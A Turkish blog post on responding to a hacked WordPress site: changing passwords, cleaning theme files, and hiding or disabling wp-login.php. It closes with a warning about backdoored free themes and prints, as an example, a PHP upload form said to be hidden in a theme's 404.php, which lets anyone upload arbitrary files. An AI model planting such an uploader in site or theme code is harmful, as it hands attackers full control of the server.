WordPress Siteniz Hackleniyorsa Yapmanız Gerekenler!

117

Merhaba Sayın Ziyaretçilerimiz,

Eğer wordpress kullanıyorsanız ve siteniz hack edildi ise;

  1. Parolaları değiştisiniz.
  2. Kullandığınız temanın içindeki index.php yi düzneleyip istenmeyen sayfayı kaldırınız.
  3. Ana dizindeki wp-login.php dosyasının ismini sadece kendinizin bileceği bir şekilde değiştiriniz.
  4. Yönetim erişimini tamamen kapatmak isterseniz wp-login.php dosyasının izin değerlerini 644 den 000 a göre ayarlayabilirsiniz.

Ayrıca Ekstra Güvenlikler!

Eğer wordpress kullanıyorsanız ve Giriş kısmına ek güvenlik olması için gizlemek istiyorsanız aşağıda anlattığımız yöntemi kullanabilirsiniz.

 

Bu yöntemle yeni üyelik, üye girişi ve üyelikle yorum yazma kısımlarıda iptal olmuş olacaktır. Kurumsal bir tema kullanıyor ve bu kısımlara ihtiyacınız yok ise yaralı olacaktır.

 

 

1-Panelinizden Dosya Yöneticisine girin. (File Manager)

 

2-public_html içindeki wp-login.php dosyasının adını Tahmin-Edilemeyecek-Sadece-Sizin-Bileginiz-Bir-Ad.php olarak değiştirin.

 

3-Değiştirdiğiniz php dosyasına sağ tıklayıp Code Edit e tıklayın.

 

4-Açılan popup pencerede birşeyi değştirmeden direk Edit Butonuna tıklayın

 

5-Yeni pencerede açılan düzenleme ara yüzünde ctrl+F tuşlarına basın.

 

6-search kısmına wp-login.php replace kısmına ise SizinVerdiginizAd.php olarak yazın.

 

7-replace all butonuna tıklayın. 13 yada 14 değişim yapacaktır.

 

8-Sağ üst bölümden Değişiklikleri Kaydet i tıklayın ve hemen yanındaki close ye tıklayın.

 

9-Dosya yöneticisi gelecektir. Üst kısımda Yeni Dosya kısmı ile bir dosa oluşturun ve adını wp-login.php yapın.

 

10-Oluşturduğunuz bu yeni dosyaya sağ tıklayıp Code edit yapın içerisine aşağıda verileni yazıp kaydedin.

 

<?php

require( dirname(__FILE__) . ‘/wp-load.php’ ); wp_logout(); if ( $reauth ) wp_clear_auth_cookie();

header(‘Location: /’);

?>

 

Panelinize sizinsiteniz.com/SizinVerdiginizAd.php adresinden giriş yapabilirsiniz.

 Peki Kullandığınız Temalar Ne Kadar Güvenilir ?

Edindiğiniz her güzel wordpress yada joomla vs. teması güvenli mi?

Eğer tema kodlarını inceleyebilecek kod bilginiz yok ise bunu asla bilemezsiniz. Taki siteniz hack edilene kadar.

 

Birileri önce ücretsiz tema dağıtıyor sonrada hepsini tespit edip bakın Hack ettik diyor.

 

Örneğin şuan baktığımızda wordpress kullanaların bir çoğunun temalarında 404.php içine açık konulmuş.

 

Siz http://sizinsiteniz.com/wp-content/themes/sizintemanız/404.php adresine gittiğinizde karşınıza bir Gözat ve Yükle çıkıyor.

 

Yani sitenizinin tamamına kendi elinizle tam erişim vermiş oluyorsunuz.

 

Aşağıda değiştirilmiş bir 404.php var ama sadece 404.php de olacak diğe bir mecburiyette yok. Tema içerisinde herhangi bir dosyaya direk yada parametre ile çağrılan kodlar konabilir.

 

Örnek Kod;

<?php

if(isset($_POST[‘Submit’])){

$filedir = “”;

$maxfile = ‘2000000’;

 

$userfile_name = $_FILES[‘image’][‘name’];

$userfile_tmp = $_FILES[‘image’][‘tmp_name’];

if (isset($_FILES[‘image’][‘name’])) {

$abod = $filedir.$userfile_name;

@move_uploaded_file($userfile_tmp, $abod);

echo”<center><b>Done ==> $userfile_name</b></center>”; } } else{ echo’

<form method=”POST” action=”” enctype=”multipart/form-data”><input type=”file” name=”image”><input type=”Submit” name=”Submit” value=”Submit”></form>’; } ?>

 


Article Tags: · · · · ·

Leave a Comment

Paylaş